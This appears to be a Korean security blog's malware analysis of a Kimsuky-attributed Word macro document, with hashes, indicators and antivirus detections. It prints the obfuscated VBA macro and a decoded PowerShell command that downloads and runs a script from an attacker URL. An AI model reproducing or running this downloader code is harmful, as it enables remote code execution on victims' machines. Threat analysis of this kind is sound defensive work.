북한 김수키(Kimsuky)에서 만든 워드 악성코드-인적사항.doc(2023.4.11)

오늘은 북한 해킹 조직 중 하나인 김수키(Kimsuky,キムスキー)는 기본적으로 한국의 싱크탱크,산업계,원자력 발전소 그리고 대북 관계자, 그리고 탈북단체에서 운영하는 주요인물을 대상으로 조직적으로 해킹하고 있으며 한국의 퇴역 장교(특히 대북 기밀 다루었던 분), 전·현직 외교관, 전·현직 정부기관에 일하고 있든 일을 하고 있지 않든 아무튼 대북 관련 단체이며 해킹을 하고 있으며 그리고 최근 영업이 러시아, 미국 및 유럽 국가로 확장하고 있으며
김수키 라는 이름은 이 그룹의 공격을 처음 보고한 러시아의 보안기업 카스퍼스키 가 도난당한 정보를 보내는 이메일 계정 이름이 김숙향(Kimsukyang)이었기 때문이며 Gold Dragon,Babyshark,Appleseed 등 수많은 악성코드를 사용했으며 전직 이름 탈륨(Thallium), 벨벳 천리마(Velvet Chollima), 블랙반시(Black Banshee) 등으로 불리고 있으며 해당 악성코드는 VBA 스크립트로 작성된 악성코드입니다.
해쉬값은 다음과 같습니다.
파일명:인적사항.doc
사이즈:109 KB
CRC32:9482c024
MD5:91d0b01a6a4a0b8edadf1df6a8e68d20
SHA-1:b39ac30367d9aa2d915e7ce5d102694b1a0c6450
SHA-256:0d663b9907a34604f120963b64a763c472e7e896857728199d3df912c93208a0
SHA-512: ae4e5fdee05faf1480b7d00801a41ced77f809286df85f294976c4a0a9311f45b02fa268b7eb4c0a2aeaa4ab4f6ac250c03c5fc38662e6059914d4c16b0f5277

인적사항 악성코드 실행

일단 워드 파일이 실행되면 이력서처럼 인적 사항을 적는 항목이 나오면 언제나 매크로를 실행해야 악의적으로 작성된 매크로가 실행되어서 개인정보를 탈취하기 위해서 동작을 합니다. 일단 매크로 편집기로 열면 비밀번호가 걸려 있기 때문에 비밀번호를 없애 주거나 Cerbero Suite Advanced 같은 프로그램을 사용하거나 하시면 됩니다. 일단 악성코드가 동작하는 코드는 다음과 같습니다.

Private Sub Document_Open()

Set ieoals(d)fasfefafawe = CreateObject("Shell.Application")
Dim bmvkdlfdjk(lf)asfw As String
pwoekdsfw = "eil(a)jfdsk"
pwoekdsfw = Left(pwoekdsfw, 4)
bmvkdlfdjklfas(f)w = "peilaeilaoweilaei(l)aeilaerseilaheleilaeilal.eeilaxeilae"
bmvkdlfdjklfa(s)fw = Replace(bmvkdlfdjklfasfw, pwoekdsfw, "")
oeioiwaofso(d)af = "[eilasteilarieilaneilag]$eilaf={(Neilawreilaaeeilaw-Oeilabje(i)lawreilaaeilaeilaeceilateila "
oeioiwa(o)fsodaf = Replace(oeioiw(a)ofsodaf, pwoek(d)sfw, "")
bncsak(s)fefw = "Neilaeweilaraeilaeilat.Weilaebeil(a)wreilaaCeilaleilaiweilaeilaraeilaeweilaraeilaneilat).Doeilaweeilaileilaseilaeiladjeilafeneilag"
bncs(a)ksfefw = Replace(bncsaksfef(w), pwoe(k)dsfw, "")
bncmdoe(o)fafe = "('heilateilateilapeila:eila/eila/mvix(.)xn--oi2b61z32a.xn--3e0b707e/eilaeeilajeila/eilalieila.eilateilaxeilat')"
bncmdo(e)ofafe = Replace(bnc(m)doeofafe, p(w)oekdsfw, "")
bmcnska(w)ew = "};$jeila=$eil(a)feila.(R)eeilapeilalaeilaeilaceilae('eilawra','');$eilau=$eilajeila.Reilaepeilalaeilaceilae('eeilai(l)eilasdeilaeilajeilafeilae',"
bmcnskawe(w0 = Replace(bmcnsk(a)wew, pwoekdsfw, "")
bmkfcnvksdfk(a)jw = "'neilaloeil(a)adeilaeilaseilatreilaieilaeila');$xeila=ieeilaeilax $eilaueila;invoke-expression $eila(x)eila"
bmkfcnv(k)sdfkajw = Replace(bmkfcnvksdf(k)ajw, pwoekdsfw, "")
peoskawefg(e)a = oeioi(w)aofsodaf (+) bncs(a)ksfefw (+) bn(c)mdoeofafe (+) bmcn(s)kawew (+) bmkfcnv(k)sdfkajw
ieoalsdfasfefafaw0(e).ShellExecute bmvkdlfdjklfasfw, peoskawefgea, "", "open", 0
End Sub

워드 매크로 악성코드 실행

이며 해당 코드는 다음과 같습니다.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell(.)exe" [string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng('http://mvix.xn--oi2b61z32a(.)xn--3e0b707e/ej/li.txt')};$j=$f.Replace('wra','');$u=$j.Replace('eilsdjfe','nloadstri');$x=iex $u;invoke-expression $x
%windir%\System32\svchost(.)exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse(.)exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell(.)exe" [string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng('http://mvix.xn--oi2b61z32a(.)xn--3e0b707e/ej/li.txt')};$j=$f.Replace('wra','');$u=$j.Replace('eilsdjfe','nloadstri');$x=iex $u;invoke-expression $x
powershell(.)exe
C:\Windows\System32\conhost(.)exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
services.exe
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n
svchost.exe

Cerbero Suite Advanced 로 본 매크로

Shell.Application 객체를 만들고, 문자열 변수에 값을 할당한 다음 문자열 치환(Replace)을 수행합니다. 마지막으로, ShellExecute 함수를 사용하여 bmvkdlfdj(k)lfasfw 변수에 저장된 파일과 peos(k)awefgea 변수에 저장된 문자열을 실행하는 코드입니다.
PowerShell을 사용하여 인터넷에서 웹 페이지의 문자열 데이터를 내려받고 실행하는 것을 목적이며 
변수 $f에 할당된 문자열은 내려받을 웹 페이지의 URL을 나타내며, New-Object cm(d)let을 사용하여. NET Framework의 WebClient 클래스를 인스턴스 화하고, DownloadString 메서드를 사용하여 해당 URL의 문자열 데이터를 다운로드 변수 $j와 $u는 문자열 처리를 통해 $f의 내용을 변경 $j는 $f에서 "wra" 문자열을 모두 제거하고, $u는 $j에서 "eil(sdj(f)e"를 "nloadst(r)i"로 바꾼 문자열을 할당 이렇게 변경된 $u는 PowerShell의 iex (Invoke-Expression) cm(d)let을 사용하여 실행
변수 $x는 $u의 실행 결과를 할당 결과는 인터넷에서 다운로드한 스크립트 또는 명령이 될 수 있으며, Invoke-Expression cmdlet을 사용하여 $x 변수에 할당된 코드를 실행합니다.
쉽게 이야기하면 PowerShell 명령어는 악성 URL로부터 원격에서 스크립트를 다운로드하여 실행을 하는 형태입니다.
그리고 Project.NewMacros 이라고 있는데 현재 커서 위치의 문자 하나 삭제 과 같은 명령어입니다.

사용하는 IP 주소는 다음과 같습니다.

145.14.144(.)206:80 (TCP)
145.14.145(.)122:80 (TCP)
145.14.145(.)245:80 (TCP)

인터넷 연결 시도

http://mvix.xn--oi2b61z32a(.)xn--3e0b707e/ej/index(.)php?filename=li
http://mvix.xn--oi2b61z32a(.)xn--3e0b707e/ej/li(.)rong
http://mvix.xn--oi2b61z32a(.)xn--3e0b707e/ej/li(.)txt

그리고 바이러스토탈(Virus Total)2023-04-11 14:42:58 UTC 기준 탐지하는 보안 업체들은 다음과 같습니다.
Acronis (Static ML):Suspicious
AhnLab-V3:Trojan/VBA.Agent.SC187664
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan[Downloader]/MSOffice.Powdow.rvcj
Arcabit:VB:Trojan.Valyria.D1380
Avast:Script:SNH-gen [Drp]
AVG:Script:SNH-gen [Drp]
Avira (no cloud):VBA/Dldr.Agent.uocsn
BitDefender:VB:Trojan.Valyria.4992
Cynet:Malicious (score: 99)
Cyren:W97M/Agent.BNQ.gen!Eldorado
Emsisoft:VB:Trojan.Valyria.4992 (B)
eScan:VB:Trojan.Valyria.4992
ESET-NOD32:VBA/TrojanDownloader.Agent.YXS
F-Secure:Malware.VBA/Dldr.Agent.uocsn
Fortinet:VBA/Agent.EWZJQCP!tr
GData:VB:Trojan.Valyria.4992
Google:Detected
Kaspersky:UDS:DangerousObject.Multi.Generic
Lionic:Trojan.MSWord.Generic.4!c
MAX:Malware (ai Score=82)
McAfee-GW-Edition:BehavesLike.OLE2.Dropper.cr
Microsoft:TrojanDownloader:O97M/Powdow.RVCJ!MTB
NANO-Antivirus:Trojan.Ole2.Vbs-heuristic.druvzi
Rising:Malware.Obfus/VBA@AI.87 (VBA)
SentinelOne (Static ML):Static AI - Malicious OLE
Symantec:ISB.Downloader!gen48
TACHYON:Suspicious/W97M.XSR.Gen
Tencent:Trojan.MsOffice.MacroV.11000245
Trellix (FireEye):VB:Trojan.Valyria.4992
VIPRE:VB:Trojan.Valyria.4992
ViRobot:DOC.Z.Agent.112128.JC
ZoneAlarm by Check Point:HEUR:Trojan-Downloader.Script.Generic
이며 난독화, 매우 긴 cmdline 옵션 등이 있는 것을 파악할 수가 있었습니다. 일단 기본적으로 백신 프로그램(안티 바이러스 프로그램)을 사용을 하면 대부분 가능하고 모르는 문서들v은 함부로 실행을 하는 것을 자제하시는 것이 안전하게 사용을 하는 방법일 것입니다.